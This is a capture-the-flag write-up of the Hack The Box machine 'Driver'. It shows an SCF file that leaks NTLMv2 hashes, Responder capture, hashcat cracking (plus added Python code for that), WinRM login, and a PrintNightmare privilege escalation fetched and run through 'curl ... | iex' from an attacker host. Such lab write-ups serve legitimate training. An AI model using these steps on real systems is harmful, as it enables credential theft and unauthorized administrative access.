Driver-htb-writeup

0x00 Skills covered

Skills in this chapter: malicious .scf files, responder, hashcat, evil-winrm, winPEASany.exe, CVE-2021-1675

Reference link: https://0xdf.gitlab.io/2022/02/26/htb-driver.html

0x01 Getting user

1. Machine description

About Driver
Driver is an easy Windows machine that focuses on printer exploitation. Enumeration of the machine shows a web server listening on port 80, SMB on port 445 and WinRM on port 5985. The website turns out to be protected with basic HTTP authentication; trying common credentials, admin:admin is accepted and we get access to the page. The page offers a feature to upload printer firmware to an SMB share so that a remote team can test and validate it. Uploading a Shell Command File (.scf) that references a file on our own machine causes the NTLMv2 hash of the user tony to be sent back to us. Cracking the captured hash to recover the plaintext password, we can log in as tony over WinRM. Switching to a meterpreter session then reveals that the machine is vulnerable to a local privilege escalation that abuses a specific printer driver present on it. Using that exploit we obtain a session as NT AUTHORITY\SYSTEM.

2. First, scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.106 --min-rate=10000
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 15:07 CST
Nmap scan report for 10.10.11.106
Host is up (0.32s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 28.60 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,445,5985 -Pn 10.10.11.106 --min-rate=10000 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 15:08 CST
Nmap scan report for 10.10.11.106
Host is up (0.20s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h49m00s, deviation: 0s, median: 6h49m00s
| smb2-time:
|   date: 2024-09-26T13:58:10
|_  start_date: 2024-09-26T13:53:33

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds

3. Add a local hosts entry

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.106 driver.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.106 driver.htb

4. Visit the home page

http://10.10.11.106/

5. There is a file-upload page

http://10.10.11.106/fw_up.php

6. I really had no idea what to do here, so I went by the walkthrough

The page says that whatever I upload will go to their file share. That means it does not necessarily land on the web server, so looking for a way to upload a webshell does not make much sense.

When you have write access to a file share, the classic attack is to drop a .scf file on the share that references an icon file on an attacker-controlled host. If a folder containing the .scf file is opened in Explorer, the .scf makes Explorer reach out to fetch that icon file, offering a Net-NTLMv2 authentication negotiation. If I control that host, I can capture the exchange and try to crack the Net-NTLMv2 offline with a brute-force tool such as hashcat. I used this technique in 2019 on the Insane machine Sizzle.

SCF files are Windows Shell Command files, and there is far more written about crafting malicious SCF files than about their legitimate use. Some old Microsoft pages (gone now, but on the Wayback Machine) show how SCF files were used to create the "Show Desktop" shortcut and "View Channels" in Quick Launch. The format is:


[Shell]
Command=2
IconFile=<icon file>
[<thing you want to control>]
Command=<command>


I will abuse the IconFile part, pointing it at my server over SMB, and create 0xdf.scf:

[Shell]
Command=2
IconFile=\\10.10.14.6\evil.exe,3

7. Here I tried it following the walkthrough

POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------25319977892483335616582605058
Content-Length: 420
Origin: http://10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://10.10.11.106/fw_up.php
Upgrade-Insecure-Requests: 1

-----------------------------25319977892483335616582605058
Content-Disposition: form-data; name="printers"

HTB DesignJet
-----------------------------25319977892483335616582605058
Content-Disposition: form-data; name="firmware"; filename="shiyan.scf"
Content-Type: text/x-python

[Shell]
Command=2
IconFile=\\10.10.14.22\evil.exe,3



-----------------------------25319977892483335616582605058--

8. Listen for and capture the authentication

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.22]
Responder IPv6 [dead:beef:2::1014]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-OKBY9DM9SSA]
Responder Domain Name [P0NL.LOCAL]
Responder DCE-RPC Port [45353]

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:37a4f8ca589ef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
[*] Skipping previously captured hash for DRIVER\tony

9. That captured the Net-NTLMv2 response; next, crack it with hashcat (mode 5600, NetNTLMv2)

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat hash -m 5600 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1438/2941 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

TONY::DRIVER:37a4f8ca589ef785:e33c2cae05048658e83212d19966e75a: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:liltony

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TONY::DRIVER:37a4f8ca589ef785:e33c2cae05048658e8321...000000
Time.Started.....: Thu Sep 26 17:03:02 2024 (0 secs)
Time.Estimated...: Thu Sep 26 17:03:02 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 628.6 kH/s (0.58ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 31744/14344385 (0.22%)
Rejected.........: 0/31744 (0.00%)
Restore.Point....: 30720/14344385 (0.21%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: !!!!!! -> 225566
Hardware.Mon.#1..: Util: 25%

Started: Thu Sep 26 17:02:53 2024
Stopped: Thu Sep 26 17:03:03 2024
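The SCF trick in step 6 and the hashcat run in step 9 are two halves of one mechanism, so here is both sides in code. This is an added example and is not code from the original post, from 0xdf's writeup or from hashcat: build_scf() produces the file that was uploaded, and the rest re-implements what hashcat -m 5600 does for each candidate password (NT hash, NTOWFv2, NTProofStr) so the capture-then-crack step can be replayed offline. The server challenge, client blob and the tiny wordlist at the bottom are constructed for the example; the MD4 is written out because hashlib's md4 is often unavailable under OpenSSL 3.

```python
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional

# Added example, not code from the original post or from 0xdf's writeup.
# build_scf() reproduces the uploaded file; the rest re-implements what
# hashcat -m 5600 does for every candidate password. The challenge, blob
# and wordlist used at the bottom are constructed for illustration.

MASK32 = 0xFFFFFFFF


def build_scf(attacker_host: str, icon_name: str = "evil.exe") -> str:
    """SCF whose IconFile is a UNC path on the attacker: when Explorer renders
    the folder it fetches the icon over SMB and authenticates while doing so."""
    return f"[Shell]\r\nCommand=2\r\nIconFile=\\\\{attacker_host}\\{icon_name},3\r\n"


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def rotl(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & MASK32

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                            # round 1
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK32, s), b, c
        for i in range(16):                            # round 2
            k, s = (i % 4) * 4 + i // 4, (3, 5, 9, 13)[i % 4]
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, s), b, c
        for i in range(16):                            # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            s = (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, s), b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK32, (b0 + b) & MASK32,
                          (c0 + c) & MASK32, (d0 + d) & MASK32)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password (what the SAM stores; unsalted)."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server challenge + client blob."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def sample_blob(client_nonce: bytes) -> bytes:
    """Constructed NTLMv2 'temp' blob: header, zero timestamp, client nonce,
    one AV pair (NetBIOS domain name 'DRIVER') and the terminator."""
    av_pair = struct.pack("<HH", 2, 12) + "DRIVER".encode("utf-16le")
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", 0)
            + client_nonce + b"\x00" * 4 + av_pair + b"\x00" * 4)


def hashcat_5600_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """What the victim computes and Responder logs: user::domain:challenge:NTProofStr:blob."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def check_candidate(line: str, candidate: str) -> bool:
    """One hashcat -m 5600 iteration: recompute NTProofStr for the candidate and compare."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":", 5)
    expected = nt_proof(candidate, user, domain, bytes.fromhex(chal_hex), bytes.fromhex(blob_hex))
    return hmac.compare_digest(expected, bytes.fromhex(proof_hex))


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    for word in wordlist:
        word = word.rstrip("\r\n")
        if check_candidate(line, word):
            return word
    return None


if __name__ == "__main__":
    print(build_scf("10.10.14.22"), end="")
    # Simulate the victim with a random challenge and a constructed blob, then crack it.
    line = hashcat_5600_line("tony", "DRIVER", "liltony", os.urandom(8), sample_blob(os.urandom(8)))
    print(line)
    print("cracked:", crack(line, ["123456", "password", "liltony"]))
```

Two things worth noticing in the code. The NT hash is an unsalted MD4, but the captured response is keyed through the server challenge and the client blob, so every capture has to be cracked on its own (Responder's "Skipping previously captured hash" line only avoids duplicate work for the same user), and what falls out is the password, not a pass-the-hash-able NT hash. Also, the username is upper-cased inside NTOWFv2 while the domain is used as sent, which is why hashcat is indifferent to "tony" versus "TONY" but a wrong domain string would never crack.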

10. Now check whether the password is valid

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.106 -u tony -p liltony
SMB         10.10.11.106    5985   DRIVER           [*] Windows 10 Build 10240 (name:DRIVER) (domain:DRIVER)
HTTP        10.10.11.106    5985   DRIVER           [*] http://10.10.11.106:5985/wsman
WINRM       10.10.11.106    5985   DRIVER           [+] DRIVER\tony:liltony (Pwn3d!)

11. It works, so log in directly

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.106 -u tony -p liltony

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> cd ../
*Evil-WinRM* PS C:\Users\tony> dir


Directory: C:\Users\tony


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        6/11/2021   7:01 AM                Contacts
d-r---         9/7/2021  10:15 PM                Desktop
d-r---         9/8/2021  12:37 AM                Documents
d-r---        6/11/2021   7:05 AM                Downloads
d-r---        6/11/2021   7:01 AM                Favorites
d-r---        6/11/2021   7:01 AM                Links
d-r---        6/11/2021   7:01 AM                Music
d-r---         8/6/2021   7:34 AM                OneDrive
d-r---        6/11/2021   7:03 AM                Pictures
d-r---        6/11/2021   7:01 AM                Saved Games
d-r---        6/11/2021   7:01 AM                Searches
d-r---        6/11/2021   7:01 AM                Videos


*Evil-WinRM* PS C:\Users\tony>

12. Get the first flag

*Evil-WinRM* PS C:\Users\tony> cd Desktop
*Evil-WinRM* PS C:\Users\tony\Desktop> dir


Directory: C:\Users\tony\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/26/2024   6:54 AM             34 user.txt


*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
f9ce1a606eea2b1270eb4b2352b514ab
*Evil-WinRM* PS C:\Users\tony\Desktop>

0x02 Getting SYSTEM

13. For enumeration I uploaded winPEASany.exe and ran it, and it turned up a few things

*Evil-WinRM* PS C:\Users\tony\Desktop> upload /home/kali/Desktop/tools/PEASS-ng/winPEASany.exe

Info: Uploading /home/kali/Desktop/tools/PEASS-ng/winPEASany.exe to C:\Users\tony\Desktop\winPEASany.exe

Data: 3168256 bytes of 3168256 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\tony\Desktop>
*Evil-WinRM* PS C:\Users\tony\Documents> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1
*Evil-WinRM* PS C:\Users\tony\Documents>


*Evil-WinRM* PS C:\Users\tony\Documents> type C:\Users\tony\appdata\local\job\job.bat
@echo off

:LOOP

%SystemRoot%\explorer.exe "C:\firmwares"

ping -n 20 127.0.0.1 > nul && powershell -ep bypass c:\users\tony\appdata\local\job\quit.ps1

DEL /q C:\firmwares\*

cls

GOTO :LOOP

:EXIT
*Evil-WinRM* PS C:\Users\tony\Documents>

14. That is a command and a scheduled job; I searched for the driver name from the command

15. It looked exploitable; here are the two exploit links

https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/

https://www.exploit-db.com/exploits/48036

16. But for whatever reason none of those exploits worked, so I switched to a different CVE and tried that

https://github.com/calebstewart/CVE-2021-1675

17. Here is the exploitation process

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.11.106 - - [26/Sep/2024 18:11:49] "GET /CVE-2021-1675.ps1 HTTP/1.1" 200 -


*Evil-WinRM* PS C:\temp> curl 10.10.14.22:8081/CVE-2021-1675.ps1 -UseBasicParsing | iex
*Evil-WinRM* PS C:\temp> Get-Command Invoke-Nightmare

CommandType     Name                 Version    Source
-----------     ----                 -------    ------
Function        Invoke-Nightmare


*Evil-WinRM* PS C:\temp> Invoke-Nightmare -NewUser "shiyan" -NewPassword "MM123456"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user shiyan as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\temp> net user shiyan
User name shiyan
Full Name shiyan
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 9/26/2024 10:01:27 AM
Password expires Never
Password changeable 9/26/2024 10:01:27 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

*Evil-WinRM* PS C:\temp>

18. Log in with the newly created account

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.106 -u shiyan -p MM123456

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\shiyan\Documents> cd C:\Users\Administrator
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/26/2024   6:54 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop>

19. Get the final flag

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
32cb5f50c7d8be2871973dbac57f10d0
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/387


Driver-htb-writeup
https://sh1yan.top/2024/09/26/Driver-htb-writeup/
Author: shiyan
Published: 26 September 2024
License